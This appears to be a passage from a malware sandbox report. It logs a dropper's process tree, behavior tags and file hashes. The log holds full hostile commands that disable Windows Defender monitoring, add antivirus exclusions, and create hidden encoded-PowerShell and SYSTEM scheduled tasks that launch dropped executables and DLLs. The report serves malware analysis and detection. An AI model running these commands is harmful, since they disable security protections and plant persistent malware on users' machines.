C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:972 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1672
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:564
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1236
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:836
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwtvmhLKC" /SC once /ST 01:03:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwtvmhLKC"4⤵PID:1960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwtvmhLKC"4⤵PID:948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bkuWmsEVxSoFBLrMoP" /SC once /ST 23:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK\OFBXxGvsibabdhk\jXNmHsV.exe\" m7 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1760
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {04B66F6F-7C22-446B-B4B1-0B9436C0FCE7} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵PID:268
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:536
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1964
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1468
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1804
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1576
-
C:\Windows\system32\taskeng.exetaskeng.exe {DB8C66DC-2BD3-4D27-B321-49790044725A} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1584
-
C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK\OFBXxGvsibabdhk\jXNmHsV.exeC:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK\OFBXxGvsibabdhk\jXNmHsV.exe m7 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:956 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkAnvaMNb" /SC once /ST 03:43:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkAnvaMNb"3⤵PID:1836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkAnvaMNb"3⤵PID:1752
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1052
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:908
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1620
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjNFsDpIv" /SC once /ST 08:18:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjNFsDpIv"3⤵PID:1768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjNFsDpIv"3⤵PID:1380
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:323⤵PID:1424
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:643⤵PID:1184
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:323⤵PID:1576
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:324⤵PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:643⤵PID:1984
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:644⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\EaSLpcFpMcYPpQna\VeRVmPvV\LYRPJgkDjaGlfwpp.wsf"3⤵PID:1944
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\EaSLpcFpMcYPpQna\VeRVmPvV\LYRPJgkDjaGlfwpp.wsf"3⤵
- Modifies data under HKEY_USERS
PID:456 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VPYaDjxZBwAU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VPYaDjxZBwAU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VuDzvJgGU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VuDzvJgGU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZGnoZfjlmqUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZGnoZfjlmqUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmPxrUzoObJDycnPoNR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmPxrUzoObJDycnPoNR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZZRdZcplUZcC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZZRdZcplUZcC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TKAtlPiSKHaugkVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TKAtlPiSKHaugkVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VPYaDjxZBwAU2" /t REG_DWORD /d 0 /reg:324⤵PID:1412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VPYaDjxZBwAU2" /t REG_DWORD /d 0 /reg:644⤵PID:968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VuDzvJgGU" /t REG_DWORD /d 0 /reg:324⤵PID:1784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VuDzvJgGU" /t REG_DWORD /d 0 /reg:644⤵PID:1080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZGnoZfjlmqUn" /t REG_DWORD /d 0 /reg:324⤵PID:1616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZGnoZfjlmqUn" /t REG_DWORD /d 0 /reg:644⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmPxrUzoObJDycnPoNR" /t REG_DWORD /d 0 /reg:324⤵PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmPxrUzoObJDycnPoNR" /t REG_DWORD /d 0 /reg:644⤵PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZZRdZcplUZcC" /t REG_DWORD /d 0 /reg:324⤵PID:1492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZZRdZcplUZcC" /t REG_DWORD /d 0 /reg:644⤵PID:976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TKAtlPiSKHaugkVB" /t REG_DWORD /d 0 /reg:324⤵PID:1964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TKAtlPiSKHaugkVB" /t REG_DWORD /d 0 /reg:644⤵PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK" /t REG_DWORD /d 0 /reg:324⤵PID:1840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK" /t REG_DWORD /d 0 /reg:644⤵PID:908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:324⤵PID:1756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EaSLpcFpMcYPpQna" /t REG_DWORD /d 0 /reg:644⤵PID:1736
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEeydhaLw" /SC once /ST 15:40:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEeydhaLw"3⤵PID:1688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEeydhaLw"3⤵PID:1484
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1420
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1632
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1860
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1496
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MMXfBASmfLrLvsZVI" /SC once /ST 21:38:30 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EaSLpcFpMcYPpQna\cVwamVazuLxyuGF\zJFuYFn.exe\" YN /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MMXfBASmfLrLvsZVI"3⤵PID:1968
-
-
-
C:\Windows\Temp\EaSLpcFpMcYPpQna\cVwamVazuLxyuGF\zJFuYFn.exeC:\Windows\Temp\EaSLpcFpMcYPpQna\cVwamVazuLxyuGF\zJFuYFn.exe YN /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1488 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bkuWmsEVxSoFBLrMoP"3⤵PID:644
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1200
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:588
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:836
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\VuDzvJgGU\MSaVuW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "XKFBGwgxrEulmgf" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XKFBGwgxrEulmgf2" /F /xml "C:\Program Files (x86)\VuDzvJgGU\AgzBXpt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XKFBGwgxrEulmgf"3⤵PID:1400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XKFBGwgxrEulmgf"3⤵PID:1592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ygYtRpdpzHKXae" /F /xml "C:\Program Files (x86)\VPYaDjxZBwAU2\WSLRzBM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSJRdsAOyHiKz2" /F /xml "C:\ProgramData\TKAtlPiSKHaugkVB\EgNvwwh.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RCDCxUhxthlawUVuW2" /F /xml "C:\Program Files (x86)\qmPxrUzoObJDycnPoNR\GxESQOo.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IIYicLxXywbNiIBtYoL2" /F /xml "C:\Program Files (x86)\sZZRdZcplUZcC\aegutEX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPnQnOXuswVFDBxMw" /SC once /ST 16:55:49 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\EaSLpcFpMcYPpQna\rmSQPOBd\hRkipGL.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPnQnOXuswVFDBxMw"3⤵PID:1416
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1516
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1940
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1848
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MMXfBASmfLrLvsZVI"3⤵PID:1624
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EaSLpcFpMcYPpQna\rmSQPOBd\hRkipGL.dll",#1 /site_id 5254032⤵PID:948
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EaSLpcFpMcYPpQna\rmSQPOBd\hRkipGL.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1132 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPnQnOXuswVFDBxMw"4⤵PID:1152
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1632
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1616
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1108
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ce538eda1ae5b5849eaa1ecc823e9442
SHA15d886432b874cf6e3184dde087bcc77f49bbe79d
SHA2564b60b7d3ca245a92d9c0dde02e3a889ab820cc18fe2c5d63af2299e366e37815
SHA512167999f202cedf3f52dee6ba6566713549a95ab2b8f018980d99f281183f1f062a3926c651e926c2a75c2be86fb2a3e8172245a37ba8216d306450080334c11a
-
Filesize
2KB
MD5603dae56acadde758dc3deb916c5c355
SHA1ee83d507df7a173941c7c2eede624031ed50c8ca
SHA25678443a4eb068438e5e8e9b63962c9d4855b7440e53f5bf6ab326567164d1824e
SHA5129549fc4ff45a2cf6b1e894834e4eb852de320b2dfdb574efd2329ef612737414a6e301cb7dc2f22fbe6c43db51e249ffbd35f0702de41f8dffb7f1d6c70dd2ce
-
Filesize
2KB
